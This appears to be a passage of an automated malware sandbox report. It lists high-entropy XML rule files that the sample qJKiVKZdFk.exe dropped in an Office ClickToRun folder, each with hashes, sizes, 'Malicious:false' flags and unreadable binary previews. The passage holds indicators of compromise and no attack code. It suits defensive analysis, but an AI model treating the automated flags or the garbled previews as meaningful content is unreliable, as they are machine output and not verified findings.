                                                                                                                                      SSDEEP:48:OgG3ayQdUWFBbeFfqmvDktfxMN7c9+CJFVeGD:JG3ayQPPb2ymLkoN7yTDee
                                                                                                                                      MD5:1D1D5AC5E1F53C08A7FDEF734BC4B632
                                                                                                                                      SHA1:81BECE69BFFA8211A1E10E83084F60D7A745CEED
                                                                                                                                      SHA-256:417914CC04CE4F7A4C2741C8F3A16560FD0E31D7F0B196D2F8605D2023E8255B
                                                                                                                                      SHA-512:8525F2357A0BE842605B002CC4877390B205C3BAB67D68FA5858FE56EEAD26B3C4D4F387090F3D9A270FB154B54700F041B25FB2D4B6147FEE8DA14CAB30B744
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..^....X..XJ!..o.k..[..??H.....B.....y.}|.B.cU.{d.DY.....b......3....c~..F......B.`....$..ZYDK.THC.7...M.;.C<.{6..C.L6x....E....._...^a.."...j>.-..b.[..x..xb&..]......g.<ma`..k.([Rz.xt..n....5..N..&..A$fH.:t.(..]`.J.,&...t..dG<.>..=..q.....F.......w.Fn2'\..w:......|.yF2"e..x.V.53.....C[.ES..oA...'...A. C.....}.3D..i..r..8#r..k................._e.g7.3.....~d[b.#*X.+.K.8..%.ugc...] .Z....8.I.$u.....%...p..Q...x.?4"\.l4.s...S.........%H..Lt.0J..&.\qe.W|2....h Ax..l.......a.~.u."b/E.8..~.....HG..|....6u.T^.:..,.L...'.l....sL.((.G.b0.n.X.^...6...=..`.%..|.$O.$-..)..D.b <.U......0<..+..Y.4....z......o.S...u..8.....y|....?.||....?.M...U.....LF....R...A2....I.\50'.Gz..o....35VT-..T.'..V...34.....~.Fva.Wf<.){..3]....s..<u.R.[..>*.{.&S..-=..T..C..'.>....^E....A..V.Z.6..y\n.....}.$...y].+Z.T..[1Aq.Qo.S.51.......9k..K0..V.*?....a.c.T.` .N...............3..T.]...*..'.#a..J.b...e..D...?-d..s4V.4../..kC...4..?[.*.X+.6.D.._2.t,......"+3$....?.5.b....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703351v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1736
                                                                                                                                      Entropy (8bit):7.885151182319511
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:orHHNjXwbkQC6pDDXRBVQgKzOZ326w+RGemD:0nFVQC6dVQgKzOZ3x+
                                                                                                                                      MD5:86FF50798DFF31FD394DDEB5BC3C6DEA
                                                                                                                                      SHA1:2EDD7C5E52DA54D134168AD91C0CEFC746D1631D
                                                                                                                                      SHA-256:93D7B404AD1D0FCAE0759D1A95A9869550004637920828419CD2FC562031DB47
                                                                                                                                      SHA-512:7D209FE5D864261234CFB38B90620F41D42335EC792E6131E9C8B28D7081270C7924C1717BCB9800436AB56A9C1187FE84452A11C843B475ABA738EFC7F50D5F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....b.A.......[I6.H...\...qB..(g].+..V.c........0...o......G..........`K...5..S.L....*-H.......Q..a:cX.m......0z..S.3..;..iS...M......n*|....Q..6...'.4...<..DP.'Q..(.ZooC...b..Bc.Y[2M..hY~...k.+u....}..j.B.8{Hl.,..*.m..<...NN.....v..?o.>.4-...C`.d..x.|..%v.....*.%..|k.M.=...b....h.G.!}.d..-.%.T......WF%.._..q%.ru.......$M...H.q...D....f...._T.i.<..D..j..a.z...........cv..=?W.....$t...y....+vnci.).t.2..^,......jN".......)....Z....M.v..........W..^.X..~..R.vN.....B......1$.)3.@p_g.H.....1...z.G.......[ .",].8......c...&A......;!t.#..4|b....Z3...d*.(t.......C.....|Q.s>f.....[....o.c..W..._..79|...P....ED.\.~.......;Gf@8..#M...M^iw...#..\.....+.{.n..E.I.4.9?$/i...........x...s.....e...Do.U...e..[...4.M...`..p.;.^JM..t.r-y6..b...?.....3..T.....s.....7HK['sE..0..b. ......5...@.OM.N../..~9E/.G..AB.v.$X;...k.g.F.+..0..EX!.I.'../..Hm.Tp.....M..~...?.M0c.i..1@...w8..].]..S.@'..}.........(:.=..H+4._.hUXg.x....5...{....r.M...6..v..6..Eu.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703400v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1721
                                                                                                                                      Entropy (8bit):7.902223657509998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MzhoW93TqiJBIoqkbnYibdIeIe+HS/dsxVBUltZpD:qd9DqinIow2Xx+2dWTUltZB
                                                                                                                                      MD5:2995124A476F96CC8EF06CB119CCB561
                                                                                                                                      SHA1:72E628CBDDCA09A4DD6CEE015EF1474B9E283C70
                                                                                                                                      SHA-256:679A58CC33DE924F9238D806AACE361C5B42819A6FE59D77E133BA763EF90C7F
                                                                                                                                      SHA-512:FEA20CB7E04CBF77B21E881D53AF413354C0DEBA929E03376F6CEF2C745B3CA406D942584EC5CF7AC8C0DD397301D013B9B693F731E69E6B0D9151AD908697CF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.[.[..ae<'.r..~.qq..2fv...a.d...J/.e....r.HA......1..!o...n...*:.. ....=....O.......x...qn>m.....0%}=^=ww</....&P!..Z.F..I.%.'"........+t..!..X..>.3.:...`i...Z<=......M...Z.._....nV7;..s.u!.$.dr3.L)N3.T..:A.V~"|....h#...P.`..4:.K..C.+r....n73.jQv...e.b.#J.$...$...... 0'..DqpOxw.).O{......<f.......28S......|...I+.e.....i..Ej.]..P/....(G.@........8$.[.^....?N.U..|..yB...c:.F..)..h..O.H.....:x(..a.1.x.S...$..B..J.'q........}.v_.=.R>.}iV.....8.#...[.....J.n79..M'G../....].....5..1....rh......&.6.2....pD....]I..h.y\.D.m.J..4.....hyL .M..../...i.....i.....9z..M.@.vKO..;............t.5.P2.......D~.7..]..)|5.....C"....3......m".?.!...L........W......cL._.r..'..^%L0..=..{... .....i..y...=.......e..W6K!.....G`... .~s..)..*........7...}..j=O...Y.k...N..9l.L..jS.R.K.....u....B........v...k.x.E.`.$..a..l..U(.,.;..F7.........Wbr...t.m.o.UP......._(5.U..O.8q..ue.MQ.5e...,Sy.:N..X.h..-A.\.W..c.8..3.P~.&..7&.7.y3b.oP......l...c..A*o7Y..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703401v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1758
                                                                                                                                      Entropy (8bit):7.886391604854069
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OJI1Hp9xXnJ8Fl7DfTBhxj1A38IHVsnnl1fJmD:mgp9xXJ8Xfthx18H2J+
                                                                                                                                      MD5:23B13C514F2CD1423F92E9337E2003FE
                                                                                                                                      SHA1:C891BCEB6DCA924E49F9EC3F6A9CBA0B9DE35332
                                                                                                                                      SHA-256:0190F7CFA87B305ADC18E83D9338AB37B503755865E2BA9D65D977328416B67A
                                                                                                                                      SHA-512:B5C2334CB45B4E50E4C03EF173E36AF4B6F3EA1346466CD271CE76497F521ADF280B9761FAE1D8E5FD6264D8AEEC4022858B5DC4BA0EE0A17A45F669C6F60555
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml3.8.A.!....i......-2.o..p...T!.&.I....Q.C$......#*.3s..VT...[]@.1.kjZFw.s..Rt}R...Y%.~:..C....t/..Gt./h.B..n.*.....s$W....Q.\.ZF.>.Z...&.....`...f1..J4...V.:..q'V.,.Y(..G..,..!IX....7o......=...e.=p....m.....G..!...A......>..>.*..p. ...UG.Y..V........M..@P.....l..q.3..53.B..V.......&:sW.....@.+.`y$.....uHFD.......0qZq...c../..>..|O..S.*.#=.y.M.D...k~.Ej.u...r..._q....f...a.!.l.......PGy.....(.......g...9.........E.5,..IJ.....]-f...Q..I.J..&....S...*....B.L....-]C(:.p.2...7..:....b.T.-?.].v..~........9.z...w(..Ig,s..dv...../.|.\.R..r:...\.87.......O..I..u....JM....fhDg..@Z$.b?.....x.H.-F.b.WI...Rt...Y.Y.l....?F.h.......H....5w..i-v&..L.Y8)o'.../j.hd4v....Im7r#H2.Hw....!..T..=..-+.|F.L.3...+.....^.S'.........z.'(N..R.....t.....W_H...8.m(.e.W&aD%..v...:m.........$....+.t..n.3]....K..Q..!.....G.;..G..F..u...3.Y..^S./...II.v....;Z*./...D.9U..<..=.|"./......U....`.4...7K.Yx...{...Y`2..R........eA.3cK8@.:..J.q..G..?1q..e.=..v....U.P...]..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703450v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1705
                                                                                                                                      Entropy (8bit):7.890552003094436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:IiDfDpwCc3xVLOz3r0oiEl1fBQXcHX2qHKLBH3D:lDrprc3xVg3r0oPPZQXaCd
                                                                                                                                      MD5:2EAE1444BB1FC0746F96092DE0C7C4D8
                                                                                                                                      SHA1:B2D639123B54DA294E5ADE8BA2FAF102C1CA8294
                                                                                                                                      SHA-256:99DF6AE40F94E4EB570F14B1328C7FF3248FC3F95F3F5C0C09101D9D08437B2E
                                                                                                                                      SHA-512:E5027258D33EDAB881ADBA0DAB06836054ED280927313F5B6B72E24829DDDC496FAA4446D48E36F292FECD91F7336CE1F4B3441F0C2135D9D81C03B8B07977C4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..L...0W.k.Ft....6../b.....1)S&v...F....qi.g...)..R..h...:`.N..x.B.....~.hP..O..;....h!v0..m.a....-../.d..eJ.?..Hh.'..,.........G.\...I......*8..w1^..f9..As.j......$.0...[+W......{.......8.r..u+.....".G`x.....S.....QI......F`...|B..brw.a...4w-...Nv..'..C-..(I......%..1}%Z..h...+......f....G....D4.../...'ht.1w.Q.....Z.,...".....'.KU.r.h...{a0]..>;.s..|.O...w....9....(.-k......*.vP..].0<<L.O...$..W`...T.+.f.p../JS....!.M...,....r.......W.P..4I..Kp....)J..~..Z.4..MX.c.........yC..F@.0W........ ..........v.u.k......Y5....G.!#4.=.StS~.;.h0..O:....C..AUz..Ea..mq.W<$.....=P....-../.U.}.D....8.^....N.x..{i.=M.2..........a4..$^r.`.".3..#..".....%....4.......'.......;.......g....#.Nm...`..$..pO.\ gM.<...?q.eS..d.....1"..L...rj?...j........|....D.r...&.q..P..5Sm.......[J..&...u..>v....IL.......X.tq....!.9....[._HX......~.f.y...*..d.....4.W^..NE.L..Pe.!.T....>.....9(.X.......8/.........-<...j.=...h. ..T.V.......\..C.3.....|.G.it...pC.|...`..Mv..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703451v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1742
                                                                                                                                      Entropy (8bit):7.873916901771776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:nILZaR3syKj6bkaOO8WDZUlH8uFwp1QCgD:nI1O3ZKjSkaOO8WDZUlHV0K
                                                                                                                                      MD5:0DF35B3C446CD04504C33EC5652FD335
                                                                                                                                      SHA1:C82DCD6A8639BBA1F0F6A6273A746DEDF34B5F5A
                                                                                                                                      SHA-256:1D7AD31FF7FCF40268CE62E6BEE190090D11FF568DE6548C1825289975BEA052
                                                                                                                                      SHA-512:AE414C99E64E8B1B236BA732196047E93016F32734709673921AB7808142E066C0E90FB9B9A949D8EEE2C27C5AFE1814A863DC9658C9BE4D88DB1452C9D1C78F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml^|...L.&..G.........>.S.y.4;....&...`J6Z.:h4.WJ..A....LT.8...G/...97.&./*i..<...).S}K.........G...j.....?..x...C.......d..~..7.m....nR.N.-b.c.k...[v.>*.P.w.............._...R...)$.W{t..T.H.PK:......b....N...D....s_."~5......q,..q.Bw.D..O.~X.{.&<.t.c9.h..L.$.....F.].n....f}h.a.'.......w.,|.k^..i.i.....8-..S%m@F.H..-.6..>).....,.%..W.l...?..p<.wv{...{B.F..?....%..D;..W.Ix..+ k..m\.L..w..&^*.O.{.....j .Mr..x.c.@>Gx._h.x..r\$..........^.7-.>..EV^..)..E~.4.=.............l.R.x..c.=.j:2......E....`...C`.6.....L..........k.f...{.;ya.t,.B...x.b..;.......>..?...5.\....`.].f.8..N.B.....B.e.A.....F.zA...!6..`...0...ivY...s....F.v.S..%.%A:.*\.(.Q|&....R..}p.k..L~?^.8...}...g...|....{.^..u..F.n.+.v._..M)..;j.}......C...#...s....BD.Y..;#:.B.t.;.*m@..g._...:..W....v~"...~...... ..a0.7.(.%....<........%V..E....]7...y|....8./..V...u...v.<M.P@D..f9:j.C-.&aLF.-..b.Z..9mOP...M..............96."`.53J..N...}.._.O..&.X..o.....v<....c5...>...0.._..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703500v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.875258711254815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:K29e/AvO3uqVoiE/3TKC+hSlU38Z/lrxSD:K2s/cO3tSiEvGTMZX6
                                                                                                                                      MD5:59DC3FEBAA5001C76A508ABE92A9D0E3
                                                                                                                                      SHA1:782DA12649A2EB15B1DB2BDFE3C97AF11009D061
                                                                                                                                      SHA-256:E198A2E433E77129023D16A5191AD76E0483EB05F5B2E77C51C51FF2644A84B4
                                                                                                                                      SHA-512:D65B8980818255B03ABC3872C9E32B9B97E45F8A3CAD4506B13AA9A5390F6AA895FE819D7DFD9F764763DF6E1F60425C29C9D12003FC8B75CFD778D2442CB687
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml........Mt.Z.c]...<......p.....{ym...........c.F..k.i...P.V.u...-..){a.8.....{O&..|.<0.I...&.E.,O.:x.gr...Zd.&.R.....P.%....Q...n..V..b.0......0*..z. ..I.T...0..F....%..."..ep.2H.X.J.jq......<.pp.M.P c|.J.F$v9.-.c......."u.._3[....,.a..qt....?.....n.h..-J:UmV^9....{....@(...fM'.....".[s(.D.@..GX?./..}W./su..2.|..N..(A'....1..BGkn .......d..D....m....2.t.b....g....O..}..wAb 9.Ilxoo...`e;.3..~?s1.s....a..%.VH.^......X..A....<...<..O.RV..n.E..c.}....+..w.o..C.8.o....2.D.Y.R..C......\."83....f.5V.*.@.6......l.....{-..9.....]$C.A.s. .L[.>x.6F.q..SG.>GY.sa.FL7H. ..~s.F"..%{..CI.j......Q..h..cB.D|..............M?.-..#...........a...Q33...K[..+...o4t..R.f......&.L....+...W.+. c~..Ep.W....7.S..2...V....0.@ey....r=.`.$c..4C.>.+L...O...2l.`.llfA..[.#.p,.1.W.%@~i../.bly........^,P.n......IL.....?m....t_....k......9...*6Q..%.c..}...a...!....%Q....=._...]kQ..y....zV..|.76.l...oL.i..54MQB....y. ).w.P$..V..F....T..WZ...".......8PI....[.E.u.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703501v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.88665174013661
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:siwG8GFLdinIbi4N5cmJVW5R77NOLmN+Gwwi8XSd5rD:siwFsdJk5VZkmMLw4H
                                                                                                                                      MD5:7B9E67C553BEF642C8059D041DF9716A
                                                                                                                                      SHA1:18BFD2ED8A03CE87987BBFD96827056883307782
                                                                                                                                      SHA-256:CC175C35223BF2898B39572695A0857EAAA80BE09AE04F2670BA29E667930246
                                                                                                                                      SHA-512:65935AFCB4C913211EC426F306B80D30EEA38CE91BAAC6E7F7360A0536BBCC3B85998C19EB03E15B1CCCB6E2AE891701E8980B544324AEEC4B17240BF0098972
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..6H..*fo.H.Ns.4C..]......QV..,....C...yZL.......;..!..2'..F...O.."kq.h..A..\@R=..s......=.l.:..."......`.:`..[.....P.`...s..... .k...3.i..r,....t.v.|k..."........\.]...4.3.z....Q.g.!...r.{R.Lj....8..A-..h..l.i..plr......a?..:.W..+.....Y%$..'.3.|h{E./'4..@.2..;." f...#.t.9...i.G..9.*s&D.n~"..j............>co..v...0l....x...M.O....0....8E.T...r...I.....?.5.....p. .!jj0.j.X..bz.......R...NUdr].OGl....<h..S.......p.c.......+.........~.n......bM..Yu._]n.....0..4@...M..\2.pU........z..^.|=$ZV......5`c$......kLu|.7`g.\.M|..*.E..].bQ/....o1.......z.%. ..?.B).x.......w. W.1..9.....f..n."$.)....)F;#...W....z....i.,...T...HO=#W...^6G.c.W....G&......e_.wPk...3A.d_"&.%@.....2..82.....M.jF...A....W.k.Q"...S..."..?..w/&.6.|..3.R..K..].R..z'H.{.............5.9C#<.L.P.4.&...gFE.0z....q.x....T.FT..........-...>d.Uwr!.C.|.'..b+F"....!......zX?%.f..=}k{...).Wsj...AE.....^.c.b.1.E.12w.n../v~U...>4.....u.b....B.V?...l.j.jm..R.Y..X.)...Y..i.S.u.`2P .

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703550v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1705
                                                                                                                                      Entropy (8bit):7.875410544623988
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MTseZtguX1aGZCB8UJJO5bD/Og3lDmpJuUOk78D:MoeZjPyYhag31mHf74
                                                                                                                                      MD5:0B7EF2A8BC33626759FE9FF94E66FFC1
                                                                                                                                      SHA1:B42AFBAB38263B6B84BD67AE51D4A5A7CF0AFC73
                                                                                                                                      SHA-256:E0BB997D12214865C8EF089D1E064244AC34447B24B66704E573915C86BABFC0
                                                                                                                                      SHA-512:1935FB6EBF2A19E8B4B628E37111C0C71EE9A96CBB3296978E2046F423BD80714F0535E59D93B11EC68855E089B382DC35CB1D419695489537495FA9523D516C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.X:.zz..~8...X....2|..'...A..+.....Y.9s...4....w..}..a=.F.2....4}.......J5....<......Ex.U..I.6.z......9....</..g....\... 9u.......lN...x..H,7V.O..Tf-....^.k0.w...D..+"~EHM.9...&...._I.8O.{....E..h...=.G..2....X.8|..N.....7...Fx..(9H.....3+..i...5..)..D..ISu.....J.c..!.#)Ts.%..O%...%.T.Dg.w.S.....b[.>..*.&..w..`qb.`....f...p...I...8....$.F.w.n..k.mi..c.9...3....-.........{&..'kC^.}...0\...'..(....-.9...%~q.....wR.$.K...1./...C.Gg..h><....8.rGm.f...4....V7..Q7'D...C/.....@.Md56.A.y......P8.g..D......9..5.s7{X........l.....M.....eU]...QtSR.~.jdnu...U.3.$.O..W...8.....b-X.U.....]\v..~.G....-+..1..J.....l.....e....j..%.._..2#....$Td.#..;jp..`.F<.w..WP...z.....$I-....9.P...A. .".Q.+.tK<......{. ....=9..j~.U.C..dQ...eG....3v.WD<...T.....y7..L2..=B.&........C........e1..B.}Q7..J-..... .L....f.u.....1S+..>z?.0.........3p...Dz.i..b....YS.k....w..]X".....J.m.O-H..f..U.)..{........).V..p`...9..*El.nijSy.x.Q.)C^..4n....L;...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703551v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1742
                                                                                                                                      Entropy (8bit):7.880938898669976
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xEwRlK8ldl5G/6meW+OKvIAfyNUIt41YD:iStldl5pEUa41E
                                                                                                                                      MD5:C03CCE0B456E55D049D996C1232942A4
                                                                                                                                      SHA1:F3618AD9AFE2BF72553FECF317181CAE8252B0EA
                                                                                                                                      SHA-256:7DF9657D25740BEEAF7DD14E71A7348675498AC2156D49D621341742465BACCB
                                                                                                                                      SHA-512:358FAE37AE014159C46AE753E1591556AB3ED43592D36F8FBA034D619E2369B6FCA5C91E235956EC53052F78C253674D39A31958F72C267E00F7FAADE7264D30
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlj.......*...Z.P.w.-.Z.2..H....d.(f..;A..(<y.'.s.;/.6..x..j.'f.q.&...\.d.G..^..b....i..i.k/.h"r......d..=..H..5..u_....v*......A...36..0j|nu:e....tA..Ml.....ov..._@^..\u...8.....x.;l`...'.=.B...(k... R5v.k....P.Y..P..B.e.!{...i*U.3R..9*.j..g..s.s..K..U.d.m.~...V.8,.....6.....{<......&..?SK0b.y....Nn:-y...zt.U...%y....<.....~.*t...MT...+d...!..$7.'<.p..A.i.l[....0.sx.c...$~..k...T.Nrf..6.Yc.`......V.{w*..z...`Ue2...cjr...G.Zl...P.._..0.jR..}q.`......j.)V.e....x%9V...\v.......@.$o....a..a6.....)K...*t..; ..R3/.\.A.m;..lv.O..~.f.w..@.....Tp..J.wj/.3......J.eug8l.|..Q.s/H...x,Z.Q....^.;..)..6...,......7..3.z#N..CX.....)...$v..v...j_...yKK!.=...M.T....iLw.z.......@n6....y...k..%Q.Q..i...<8...3... ..r$iL......]..DXO.e.V...VM..~MX.6.a.V.`....o.G..#..$.W...^6......r....X.B.......0.w/............!....IY.Nf.*k4..@@.3.H8[.x......|$[....D..1I..S/.u.fP`7........'..d..9....E*..W.|J.C.t.{.M...T..4..-Sc.1.l.0..g......8.../.f.m..[.d... ...}.......8?,b^...,

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703600v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1691
                                                                                                                                      Entropy (8bit):7.873453052798616
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:FCPJZ1uQB8gq9Nd4q+SPN10olAcTsdK3eU53ITD:+B8giq9SV+o3Tsai/
                                                                                                                                      MD5:ED5BB76BD59A297FFE3992D9139D5E2D
                                                                                                                                      SHA1:E8316EB2AEDC97364677F839A306175A6438F310
                                                                                                                                      SHA-256:578148AA7F989CB99246F38396F78CC7CE03CF2DC936361D9AD1A38212A77318
                                                                                                                                      SHA-512:29F588850C8A3E1D433EB318200CD0A988BE67D3F7FCCFA028A3A9695494E7C0247CC7D3E781E763C3D63D3E336A7735754835CD757099F21D7B413BBE8F2054
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.,N.c.....|M......N..7.=.e....)o+.W.Y...Te..|.<.E.2j1$.i.%.....3d...G.|j......M.....m.q[4.Vrubd....e....gw.3_.....v..m...7..vU....CT9.>..7..W..bvP..X..-CB... .~...*..>.m .Uz0......m.K...F....%.r.^F.".F/..`..{].........Zn..|..K..t..6.Ud.6.%GB....1i..:...yM...i...h%...........?y...^...H!\$-....M>..d.sH/.b_A....ibl.d.H.*....6J{;.b.+x|k0U.........dJ..M....`..z....8.y.1..........*..0=.%o(...7A.Z...p.j.X...!...b../?.1.~.G...mn.$.Y.\.M$e...0.uO.Y....-U.j ..C....X.S.?.f.#.}.$..8.I..5y.Nb#dO.`..ea.$.l..R...x..:.!.l.....e.O..P.O..O.U5.=..:.......?M..V.8F..S..2....1.q..3P...qyO.U.......x..=Q.I.9-b...iI.. guw....h..D}....@.Y..?'f.w..T..."8Mn.....?........H.b. .%WG.h.-wC...**C.V2..f.I.....we"N..m.SW@..Lo.5...|....v.99.#).J9.. k..{..D..`.M...........S.}w...tj..C..6.&~.`A.K..).y.,?bpbw..{.2.G.E...{...q...=..]q..DKtJ.m...X.....=.l.......p..Q...{<..........j....`.Y1.TO....y`w.Z..x..r...5...a...<.d".2.c0g.b|.).M-:$....A..a>.}.%.UP.9Nt..7.H.Py.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703601v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.86039711216328
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:VnnS3dtnJlG/RwdH/e7ZzR1FSQ1iwi9BPD:VSttnDsRwWJ/ibb
                                                                                                                                      MD5:933672B7023AE86BECE39F4D6D10873D
                                                                                                                                      SHA1:5ECFFD22E9FFA7C6B6EB58F1C8177800ABDB5C35
                                                                                                                                      SHA-256:7D94D1B02420E002C9994F0017886E6FBE8D96F194F2A374F2D2D9917130CC42
                                                                                                                                      SHA-512:161636E3CECC4122EF629B4EBF0A0BD7623B3F7209D81E9365093073B276A1D5F8EA96F5822DC7FD979BD639ECFCE23E33A1406C55DE4BDDCD70B8C0317302C7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....r....4...t&...3.*i.d..Rc.>._.........+.....=/..../B...@.....P..0.2..K.KmD-.-<....d.[7&J.....\....$.`M.n.i.-.r...P&(q.T.D..\..2<.|Gn.j-.Mc..u..Jvap.{9V....nW..1......E..E.L......./UfDU.......Az...S@7.~...X.bC...o.....?.2........6.....nP....h.I..}...."..q...d.?r..s.w..Z.f.7 .....~iu.z.g.7j....CG ..[%r$...8..Yu.c..D4..M(}...8"...C.4X.....9...I4.R..........v........O..{...aEc.;.V..Z..'..p.Hb..3.y.....ER.T.(.f`^&51.......J>...f.ne.>Z.B.\.jJ.Dy...A....S...i....P..'A=..u.i\(....d.h...}]........:@.c0..E.2f.K..G.....o...7Hso.Ex*.L..+.W..........l6.....x...2..e...r.....y}u...g...YT..........b.....P..1.%>..q)rYl...A``...O'v_...f;...?.^_......S...h..NP..`.D....=..........(.....p....CP..}.a.i........M....B.:.../.f,.W.-.;..`...HY..m.&#..ia...|..Fc7.94...>...f..9..e...^}..nc..%;...)/.....E..@B.t.c....-.....N....1.JrS.T2..{y.......+.x..X....;D..]..f'b......7...................RF.v....u.&..c...../.....n.e.F.Z}e.|f...<..4Q.......!....s."..b

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703650v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.890630242086842
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:e5yHNvFP3C99ZWzCVD7nHd2RQbEV6SpuQ3icW0Enw3D:IyHN89ZWzY3HjbEV6SkcW0t
                                                                                                                                      MD5:ED141904E747F7434D30FE0443735660
                                                                                                                                      SHA1:59BB9358FFACACD3B388B4469A1125EBBA5E11A8
                                                                                                                                      SHA-256:8B32EA00A1986F3B60261965F088226390C56A6BAFB48528E6D898A1486E5A90
                                                                                                                                      SHA-512:4D3D6D5161254173B44FEED79E217DF8C36B24AD6A2D1ADE0539E25E90B2AF4255A751FA3D57259C70FC53463A0D30D2B049C333B537AC73BA2EF22175F5BC8E
                                                                                                                                      Malicious:false
